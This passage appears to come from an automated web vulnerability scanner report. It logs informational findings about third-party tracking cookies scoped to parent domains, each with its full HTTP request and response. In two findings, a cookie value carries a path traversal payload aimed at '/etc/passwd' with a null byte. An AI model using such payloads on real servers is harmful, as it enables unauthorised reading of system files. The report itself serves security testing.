Set-Cookie: rsiPus_bmoM=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_HmBn=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_8At2=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_-43F=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_ZQ2V=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_X7VX=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_O93y=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_semT=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_qPtn=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_lHfg=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_tnTy=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_cCPz=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_uI4c=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_2KsA=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_reJm=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_tv4w=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_A8W5=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_oGKA=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_cy6Z=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_ZrA0=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_L8i2=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_Sa36=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_FrsI=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_zESt=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_Ym1n=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_pUuq=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_uwnv=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus__2mg=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_EZsx=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_ZZ0H=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_BNSC=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_tax2=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_xyGv=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_yfbI=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_sG0W=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_4VQP=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_ExVS=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_cgR7=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_wtrl=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_o9vY=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_xmhv=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_qM8j=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_waet=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_RBpd=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_mILT=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus__nAQ=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_VsZJ=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_xqRq=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_GHGt=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_DSfE=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_tlyw=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_8Xg2=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_J61O=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_hhbJ=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_pHL8=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_XsfT=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_eQFb=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_qJz5=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_E85s=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_5Ucm=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_v_f5=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_bDDn=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_rNcS=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_5TRc=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_l2Kn=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_sZLs=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_qEBt=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_GPFg=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_HG8X=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_AMrT=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_L9DA=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_1djr=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_R2Sk=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_tqia=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_W0Nw=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_wjT0=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_OVF5=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_xj6q=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_Tn_F=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_Xy4W=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_7q1i=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_3mus=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_9AUr=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_nDzG=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_41iQ=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_70NL=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_lLND=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_WJEP=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_ew4y=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_Av4C=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_KbQB=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_VU1j=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_tsTn=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_RqxL=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_CYmT=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_3BOa=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_dhOx=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_gXRf=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_w1GX=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_91sR=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_5Xxa=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_xUzf=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_RS6A=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_rX_Y=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_ynys=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_xND8=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_U2-d=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_S-vO=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_HG7G=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_id7F=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_2D0P=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_M1Z_=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_2RcV=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_fldA=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_i0tL=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_4m8k=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_ppkq=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_G93Z=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_JCjG=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_yHyN=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_C5Uh=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_8olB=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_kFhz=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_JeGp=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_Re8S=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_pDeg=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_wxyS=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_VyjV=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_JsaM=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_1p6o=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_VIa5=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_Zc6p=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_ptuf=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_AlmC=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus__Yzb=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_k7NG=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_dpiY=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_OLBq=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_D3J-=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_Tpuf=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_MnS9=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_Bpmx=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_gx4y=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_OGcW=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_4g95=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_gjH6=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_GCsG=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_l41s=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_nSTc=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_Zd-e=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_Dpzn=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_AnWT=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_Jcjr=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_wDL0=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_GNkZ=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_Mzt2=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_A76z=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_pLOm=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_4cFc=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_kaha=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_ar9b=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_Iei_=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_h03W=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_QYQn="MLtXrt8vtl9rIAF9m8HM9CRwtSv8pwYgsssFOu5OTeOlKAZz5+/wuXtI5aPioHhhdEjAIagkY/G8GHOoPBTZKbe4LvfbnbdkKhONXmKkgHQgdLckCXP0Ycf6bL86yMYbL1uMiqL/s6MNej7gFcLrWQkAx8c6IYdi+yDQifN3Qycz6Jj1em6Y5Eay9ZRgmRVQd4wL1CPn/dRQ4JoZ5iAZWwFtgtxpYZ2eGJoLULxN8vLRSvbSAvOi3Mra/1wX6oTWmDs4ThHYmdgsHYPtkd1lfMJC8ZS8jNp4O4oZuhx+vDf6G8BYd19mNkCBOkzH6Y5GDSLMLc63IB0="; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Set-Cookie: rsi_us_1000000="pUMdJT+nPwIU1E3iQP/BkuMwYFC/diQV0mvz1kXs5llWevPI1xyt5IqzZ0HDpONBtYN5cOLq0Y0MDID8b06p+8YfclUA4HvE3pDVHOKpUDklOCk54RC6OSRkNnczdlHDXHWQC6K2swSQQ8vVN2F0i59OQ6jp4qiSUEONuY85ZLA1Z2OyLU7/10FZsW1qEmbSN89x1MtT5/YXPu6DPZWarOszUzHMAM6vuE+ScvdcP+yZdGgOlHPP/W1ItoFBhTdC6A1Odb9j1OcflxsGDAS+oJUNSD9BzBZwRhj081y7EhoDAlJhbCbdrv1IH+PUUcSGeWWa22CRI45O5ghe229XFch3R1pn6IVPDoJ0f2o2u6pC5soNdicK1r6OIJtTUJYNMJ4Aokj2+wkCi6Dq0alCMv+y91oSzdzJML8XwFhOstZBVOK/yZnmnfQ8mrl2zxNd4jrDQdB3J8hekQlKbwyg04s/a+Xgg6dTRJxRGxiQzc14wcItC4fC6wLc1No6sCqhw3U73G0sjkmOFoTzvKDWN/3nGjFh+adnq0HcLMjR+YKLjDY0tNuQMWEuFltUlAgfqrTRFHxgP/Fn38NCegLSnmgcUO8uIjl9mnNIBv0OpuMGKyGSX7f87985TmujaEs7n4Xy3a8QwtAnyqvCVqWpaHblOUXKl/U05rcz/at/8Kjpeuta5HGv1ZFOr7VvUY+fz9KlfFudANzZAm9Lcnecfk7HsAOBfj/bdkFmEFQ/TOgsExdf2KuIMzN7undJHKkdiOaTnklC9BA1XtwilEI3jTiWQFnsJhae+MXm28ZbizmAiaW7ESZH/CbfiHSOihUPQmrIEP0CEiOHkmwIIoboUPBGX66D1fSP1Oqj1qIKDU2VCS7592sVuMDhONvjwIUedzswvIQMf5g="; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Content-Type: application/x-javascript;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Sun, 04 Sep 2011 00:57:01 GMT
Content-Length: 541

function rsi_img(p,u,c){if(u.indexOf(location.protocol)==0){var i=new Image(2,3);if(c){i.onload=c;}
i.src=u;p[p.length]=i;}}
function rsi_simg(p,s,i){if(i<s.length){rsi_img(p,s[i],function(){rsi_sim
...[SNIP]...

11.10. http://b.scorecardresearch.com/b previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://b.scorecardresearch.com
Path:	/b

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

UID=9951d9b8-80.67.74.150-1314793633; expires=Tue, 03-Sep-2013 00:48:11 GMT; path=/; domain=.scorecardresearch.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b?c1=2&c2=6035630&c3=&c4=&c5=&c6=&c15=&ns__t=1315097328739&ns_c=UTF-8&c8=Notre%20Dame%2C%20Michigan%20stadiums%20cleared%20due%20to%20storms%20%7C%20Reuters&c7=http%3A%2F%2Fwww.reuters.com%2Farticle%2F2011%2F09%2F04%2Fus-weather-football-idUSTRE78222D20110904&c9=http%3A%2F%2Fwww.reuters.com%2Farticle%2F2011%2F09%2F03%2Fus-weather-football-idUSTRE78222D20110903 HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://www.reuters.com/article/2011/09/04/us-weather-football-idUSTRE78222D20110904
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633

Response

HTTP/1.1 204 No Content
Content-Length: 0
Date: Sun, 04 Sep 2011 00:48:11 GMT
Connection: close
Set-Cookie: UID=9951d9b8-80.67.74.150-1314793633; expires=Tue, 03-Sep-2013 00:48:11 GMT; path=/; domain=.scorecardresearch.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
Server: CS

11.11. http://b.scorecardresearch.com/p previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://b.scorecardresearch.com
Path:	/p

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

UID=9951d9b8-80.67.74.150-1314793633../../../../../../../../etc/passwd%009951d9b8-80.67.74.150-1314793633; expires=Tue, 03-Sep-2013 00:52:26 GMT; path=/; domain=.scorecardresearch.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /p?c1=7&c2=2000002&c3=1&cv=2.0&cj=1 HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://content.usatoday.com/communities/campusrivalry/topics
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633

Response

HTTP/1.1 200 OK
Content-Length: 43
Content-Type: image/gif
Date: Sun, 04 Sep 2011 00:52:26 GMT
Connection: close
Set-Cookie: UID=9951d9b8-80.67.74.150-1314793633../../../../../../../../etc/passwd%009951d9b8-80.67.74.150-1314793633; expires=Tue, 03-Sep-2013 00:52:26 GMT; path=/; domain=.scorecardresearch.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
Server: CS

GIF89a.............!.......,...........D..;

11.12. http://b.scorecardresearch.com/r previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://b.scorecardresearch.com
Path:	/r

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

UID=9951d9b8-80.67.74.150-1314793633../../../../../../../../etc/passwd%009951d9b8-80.67.74.150-1314793633; expires=Tue, 03-Sep-2013 01:06:36 GMT; path=/; domain=.scorecardresearch.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /r?c2=6035363&d.c=gif&d.o=nmsacramento&d.x=189535721&d.t=page&d.u=http%3A%2F%2Fblogs.sacbee.com%2Fthe_state_worker%2F%23navlink%3Dnavdrop HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://blogs.sacbee.com/the_state_worker/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633

Response

HTTP/1.1 200 OK
Content-Length: 43
Content-Type: image/gif
Date: Sun, 04 Sep 2011 01:06:36 GMT
Connection: close
Set-Cookie: UID=9951d9b8-80.67.74.150-1314793633../../../../../../../../etc/passwd%009951d9b8-80.67.74.150-1314793633; expires=Tue, 03-Sep-2013 01:06:36 GMT; path=/; domain=.scorecardresearch.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
Server: CS

GIF89a.............!.......,...........D..;

11.13. http://bh.contextweb.com/bh/rtset previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bh.contextweb.com
Path:	/bh/rtset

Issue detail

